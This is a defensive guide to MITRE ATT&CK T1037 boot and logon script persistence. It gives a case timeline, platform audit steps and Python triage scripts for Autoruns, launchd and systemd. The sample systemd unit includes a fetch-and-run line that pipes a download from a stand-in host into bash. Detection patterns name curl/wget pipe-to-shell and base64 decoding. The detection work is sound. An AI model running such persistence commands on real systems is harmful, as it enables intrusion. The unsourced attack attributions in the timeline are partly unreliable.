Boot or Logon Initialization Scripts (T1037)
MITRE ATT&CK Framework Overview (T1037)
The MITRE ATT&CK framework is a comprehensive knowledge base of adversary tactics and techniques based on real-world observations. The "Boot or Logon Initialization Scripts" technique falls under Persistence, involving scripts that run during system boot or user logon to maintain access upon reboots or logins.
Technical History and Notable Attacks
Overview
Boot or Logon Initialization Scripts have long been used for persistence by both sophisticated APT groups and cybercriminals. These scripts run automatically during system boot or user logon, enabling adversaries to execute code without direct interaction.
Key Elements
Tactic: Persistence
Technique ID: T1037
Sub-techniques:
T1037.001: Logon Script (Windows)
T1037.002: Network Logon Script
T1037.003: RC Scripts
T1037.004: Startup Items (Mac)
T1037.005: Startup Items (Linux)
Timelines and Notable Cases
2010s
2012 - Flame malware
Details: Used Windows logon scripts for persistence. Targeted Middle Eastern countries.
Actors: Suspected state-sponsored.
Impact: Espionage and data exfiltration.
2014 - Power Worm
Details: PowerShell scripts during logon for multi-stage payloads, lateral movement, persistence.
Actors: Cybercriminal groups.
Impact: Data exfiltration, ransomware.
2017 - APT28 (Fancy Bear)
Details: Placed scripts in network logon scripts for enterprise environments.
Actors: APT28 (Russian GRU).
Impact: Political espionage, cyber attacks.
2020s
2020 - FIN7
Details: Used Windows logon scripts for malware delivery. Targeted hospitality and retail.
Actors: FIN7.
Impact: Financial theft, credit card breaches.
2021 - SolarWinds Supply Chain Attack
Details: Modified Windows logon scripts for persistence in enterprise environments.
Actors: Suspected state-sponsored (APT29/Nobelium).
Impact: Widespread impact across sectors, including U.S. federal agencies.
Groups and Tools
APT28 (Fancy Bear): Used logon scripts in espionage campaigns.
APT29 (Cozy Bear): Utilized in campaigns like SolarWinds attack.
FIN7: Integrated logon scripts into malware arsenal.
TrickBot: Evolved to use PowerShell logon scripts for persistence.
People of Interest
Pyotr Levashov: Allegedly linked to the Kelihos botnet, using logon scripts for persistence.
Maxim Yakubets: Involved with Dridex and TrickBot, using logon scripts.
1. Windows Environment
Identify Unauthorized Scripts:
Use `Autoruns` utility from Sysinternals to identify unauthorized scripts at boot or login:
Download Autoruns from Microsoft Sysinternals.
Run the executable and review entries under the Logon tab.
Investigate unknown entries and remove them if confirmed malicious.
Group Policy Configuration:
Open `Group Policy Management Console` (GPMC).
Navigate to `User Configuration -> Administrative Templates -> System -> Scripts`.
Define and enforce permitted scripts for startup, shutdown, logon, and logoff.
Monitoring with Windows Event Logs:
Enable and review Event IDs 7045 and 6013 using Event Viewer:
Navigate to 'Event Viewer -> Windows Logs -> System' and filter by the above Event IDs.
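Reviewing the Logon tab by hand does not scale across a fleet, so the following is an added example (not part of this page and not Sysinternals code) that triages an Autoruns CSV export, such as the output of autorunsc with the `-c` switch, in Python. It keeps only enabled Logon-category entries and flags any whose image is not signature-verified, lives in a user-writable directory, or launches through the UserInitMprLogonScript registry value that T1037.001 documents. The CSV sample is constructed and its column names are an assumption, so align `triage_logon_entries` with the header of your own export.

```python
import csv
import io

# Constructed sample shaped like an Autoruns CSV export (autorunsc -c);
# the column names used here are an assumption, so check the header of a real export.
SAMPLE_AUTORUNS_CSV = r"""Entry Location,Entry,Enabled,Category,Signer,Image Path
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run,SecurityHealth,enabled,Logon,(Verified) Microsoft Windows,c:\windows\system32\securityhealthsystray.exe
HKCU\Environment\UserInitMprLogonScript,UserInitMprLogonScript,enabled,Logon,(Not verified),c:\users\alice\appdata\local\temp\update.bat
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup,helper.lnk,enabled,Logon,(Not verified),c:\users\public\helper.exe
HKLM\SYSTEM\CurrentControlSet\Services,Winmgmt,enabled,Services,(Verified) Microsoft Windows,c:\windows\system32\svchost.exe
"""

# Directories a standard user can write to; an autostart image living here deserves a look.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

# Registry value documented under T1037.001 (Logon Script) as a logon-script launch point.
LOGON_SCRIPT_VALUE = "userinitmprlogonscript"


def triage_logon_entries(csv_text):
    """Return the enabled Logon-category entries that deserve analyst attention,
    each with the list of reasons it was flagged."""
    findings = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Category"] != "Logon" or row["Enabled"].lower() != "enabled":
            continue
        image = row["Image Path"].lower()
        reasons = []
        if not row["Signer"].startswith("(Verified)"):
            reasons.append("image signature not verified")
        if image.startswith(USER_WRITABLE_PREFIXES):
            reasons.append("image in user-writable location")
        if LOGON_SCRIPT_VALUE in row["Entry Location"].lower():
            reasons.append("UserInitMprLogonScript launch point")
        if reasons:
            findings.append({
                "location": row["Entry Location"],
                "entry": row["Entry"],
                "image": row["Image Path"],
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for finding in triage_logon_entries(SAMPLE_AUTORUNS_CSV):
        print(f"{finding['entry']}: {finding['image']}")
        for reason in finding["reasons"]:
            print(f"    - {reason}")
```

Run against the constructed sample, the signed SecurityHealth entry passes, the Services row is skipped, and the two user-profile entries are reported with their reasons; the same function can be pointed at exports collected from many hosts and the results diffed against a known-good baseline.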
2. macOS
Check for Unauthorized Startup Items:
List all login items and LaunchAgents/LaunchDaemons:
ls /Library/LaunchDaemons
ls /Library/LaunchAgents
ls ~/Library/LaunchAgents
Investigate and remove suspicious items.
Review User Login Items:
Open `System Preferences -> Users & Groups -> Login Items`.
Remove suspicious or unauthorized login items.
Configure System Integrity Protection (SIP):
Ensure SIP is enabled:
csrutil status
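Listing the launchd directories shows file names only; what matters is what each property list launches and how. The following is an added example (not part of this page and not Apple code) that parses a launchd plist with Python's standard `plistlib` and reports the signals an analyst looks for: an Apple-style label living outside /System/Library, an inline shell command instead of a program path, references to user-writable or hidden paths, and auto-start keys (RunAtLoad/KeepAlive). The sample plist is constructed; `scan_launchd_dirs` walks the directories the text above lists and simply returns nothing on a host that has none of them.

```python
import os
import plistlib

# Constructed sample LaunchAgent; not taken from any real system.
SAMPLE_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.apple.softwareupdate.helper</string>
    <key>ProgramArguments</key>
    <array>
        <string>/bin/sh</string>
        <string>-c</string>
        <string>/Users/alice/Library/.cache/agent</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>KeepAlive</key>
    <true/>
</dict>
</plist>
"""

# The directories listed in the text above.
LAUNCHD_DIRS = (
    "/Library/LaunchDaemons",
    "/Library/LaunchAgents",
    os.path.expanduser("~/Library/LaunchAgents"),
)
APPLE_OWNED_PREFIX = "/System/Library/"
# Locations a non-admin user can write to or that are routinely used as scratch space.
UNTRUSTED_PREFIXES = ("/Users/", "/tmp/", "/private/tmp/", "/var/tmp/")


def audit_launchd_plist(data, plist_path):
    """Parse one launchd property list and return a summary dict with the
    reasons (possibly none) it should be reviewed."""
    plist = plistlib.loads(data)
    label = plist.get("Label", "")
    args = plist.get("ProgramArguments") or []
    program = plist.get("Program") or (args[0] if args else "")
    reasons = []

    if label.startswith("com.apple.") and not plist_path.startswith(APPLE_OWNED_PREFIX):
        reasons.append("Apple-style label outside /System/Library")
    if os.path.basename(program) in ("sh", "bash", "zsh") and "-c" in args:
        reasons.append("inline shell command instead of a program path")
    for arg in [program] + args:
        if arg.startswith(UNTRUSTED_PREFIXES):
            reasons.append(f"references user-writable path {arg}")
            break
    for arg in [program] + args:
        parts = [p for p in arg.split("/") if p not in ("", ".", "..")]
        if any(p.startswith(".") for p in parts):
            reasons.append(f"hidden path component in {arg}")
            break
    if plist.get("RunAtLoad") or plist.get("KeepAlive"):
        reasons.append("starts automatically (RunAtLoad/KeepAlive)")

    return {"path": plist_path, "label": label, "program": program, "reasons": reasons}


def scan_launchd_dirs(dirs=LAUNCHD_DIRS):
    """Audit every .plist in the launchd directories that exist on this host."""
    results = []
    for directory in dirs:
        if not os.path.isdir(directory):
            continue
        for name in sorted(os.listdir(directory)):
            if not name.endswith(".plist"):
                continue
            path = os.path.join(directory, name)
            try:
                with open(path, "rb") as fh:
                    result = audit_launchd_plist(fh.read(), path)
            except Exception as exc:  # an unreadable or malformed plist is itself worth noting
                result = {"path": path, "label": "", "program": "", "reasons": [f"unparseable: {exc}"]}
            if result["reasons"]:
                results.append(result)
    return results


if __name__ == "__main__":
    sample_path = os.path.expanduser("~/Library/LaunchAgents/com.apple.softwareupdate.helper.plist")
    print(audit_launchd_plist(SAMPLE_PLIST, sample_path))
    for hit in scan_launchd_dirs():
        print(hit["path"], hit["reasons"])
```

The auto-start reason fires for many legitimate jobs and is there for context; the label, inline-shell and path reasons are the ones that should drive the investigation. Because `plistlib.loads` detects the format itself, binary plists from the same directories parse without any change.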
3. Linux
Identify Startup Scripts:
Inspect various init directories for unauthorized scripts:
ls /etc/init.d/
ls /etc/rc*.d/
Check user crontab and system-wide cron jobs for unknown entries:
crontab -l
cat /etc/crontab
Investigate and remove unauthorized scripts.
systemd Services:
List active services and review custom service files for unauthorized scripts:
systemctl list-units --type=service
find /etc/systemd/system/ /lib/systemd/system/ -name '*.service'
Audit User Profiles:
Review `.bashrc`, `.bash_profile`, and other shell initialization files for unauthorized commands:
cat ~/.bashrc
cat ~/.bash_profile
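The systemd and shell-profile checks above produce raw text that still has to be read. As an added example (not part of this page and not systemd code), the Python below parses a unit file the way a reviewer reads one, keeping every repeated `ExecStart*=` line, and flags commands that pipe a download into a shell or reference scratch or home directories, plus units enabled at boot through multi-user.target. It then diffs a user's `.bashrc` against the distribution baseline (on most systems `/etc/skel/.bashrc`) so only lines the user, or something acting as the user, added are examined. The unit file, the baseline and the user profile are all constructed samples.

```python
import re

# Constructed sample unit file (not from any real host).
SAMPLE_UNIT = """[Unit]
Description=System Update Helper
After=network-online.target

[Service]
Type=simple
ExecStartPre=-/usr/bin/mkdir -p /dev/shm/.u
ExecStart=/bin/bash -c "curl -fsSL http://example.invalid/u.sh | bash"
Restart=always

[Install]
WantedBy=multi-user.target
"""

# Constructed shell-profile samples: the distribution baseline and one user's copy.
SKEL_BASHRC = """# ~/.bashrc: executed by bash(1) for non-login shells.
case $- in *i*) ;; *) return;; esac
HISTSIZE=1000
alias ll='ls -l'
"""
USER_BASHRC = SKEL_BASHRC + """alias ls='ls --color=auto'
nohup /home/alice/.config/.x/run >/dev/null 2>&1 &
"""

UNTRUSTED_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/")
PIPE_TO_SHELL = re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z|da)?sh\b")
PROFILE_INDICATORS = (
    re.compile(r"\b(curl|wget|nohup|eval)\b"),
    re.compile(r"base64\s+(-d|--decode)"),
    re.compile(r"/(tmp|var/tmp|dev/shm)/|/\.[^/\s]+/"),  # scratch dirs or hidden directories
)


def parse_unit(text):
    """Minimal systemd unit parser: {section: {key: [values...]}}.
    Keys may repeat (several ExecStartPre= lines), so every value is kept."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections.setdefault(current, {})
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            sections[current].setdefault(key.strip(), []).append(value.strip())
    return sections


def audit_unit(text):
    """Return review findings for one unit file."""
    unit = parse_unit(text)
    service = unit.get("Service", {})
    findings = []
    for key in ("ExecStartPre", "ExecStart", "ExecStartPost"):
        for cmd in service.get(key, []):
            if PIPE_TO_SHELL.search(cmd):
                findings.append(f"{key} pipes a download into a shell")
            for token in cmd.split():
                # strip systemd's exec prefixes (-, @, +, !, :) before looking at the path
                if token.lstrip("-@+!:").startswith(UNTRUSTED_DIRS):
                    findings.append(f"{key} references untrusted path {token}")
                    break
    if "multi-user.target" in unit.get("Install", {}).get("WantedBy", []):
        findings.append("enabled at boot via multi-user.target")
    return findings


def added_profile_lines(baseline, candidate):
    """Non-blank lines present in the user's profile but absent from the baseline."""
    base = set(baseline.splitlines())
    return [l for l in candidate.splitlines() if l.strip() and l not in base]


def flag_profile_lines(lines):
    """Keep only the added lines that match a download or persistence indicator."""
    return [l for l in lines if any(p.search(l) for p in PROFILE_INDICATORS)]


if __name__ == "__main__":
    for finding in audit_unit(SAMPLE_UNIT):
        print("unit:", finding)
    for line in flag_profile_lines(added_profile_lines(SKEL_BASHRC, USER_BASHRC)):
        print("profile:", line)
```

On the samples the unit is reported three times (the scratch path in ExecStartPre, the piped download in ExecStart, and boot-time enablement) and only the `nohup` line of the user profile is flagged; the harmless added alias is ignored. In production, feed `audit_unit` the files returned by the `find` command above and compare each user's profile against `/etc/skel`.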
4. Amazon AWS
Review EC2 User Data Scripts:
Check and audit startup scripts in User Data for EC2 instances:
Navigate to the EC2 instance in AWS Console.
Check 'View/Change User Data' in instance settings.
CloudWatch Logs Monitoring:
Set up CloudWatch to monitor logs for unauthorized script executions:
Create a CloudWatch log group for instance logs.
Configure CloudWatch Alarms for suspicious activity.
IAM Policy Enforcement:
Enforce strict IAM policies to ensure only authorized users can modify boot scripts and configurations:
Check IAM policies for EC2 and restrict permissions as necessary.
5. Google Cloud Platform (GCP)
Instance Metadata Scripts:
Audit and review startup scripts in instance metadata:
gcloud compute instances describe [INSTANCE_NAME] --zone [ZONE]
Check the 'metadata' section for any startup script configurations.
Logging and Monitoring:
Enable Stackdriver Logging to log and alert on unauthorized script executions:
Navigate to 'Logging' in GCP Console.
Set up metrics for startup scripts and create alerts for anomalies.
IAM Roles and Permissions:
Restrict permissions using IAM to control access to metadata and startup script configurations:
Review IAM roles and apply the least privilege principle to IAM policies affecting instance metadata.
6. Microsoft Azure
Virtual Machine Extensions:
Check for any custom script or VM extensions that may introduce unauthorized scripts:
Navigate to 'Virtual Machines' in Azure Portal.
Check installed extensions under 'Settings -> Extensions + applications'.
Azure Monitor Alerts:
Leverage Azure Monitor to set up alerts for suspicious activities or modifications to startup scripts:
Create a Log Analytics workspace.
Set up alerts for logs indicating changes to startup or initialization scripts.
Network Security Groups (NSG):
Use NSGs to restrict access and ensure only authorized entities can modify VM settings/scripts:
Review and update NSG rules to limit access to management ports.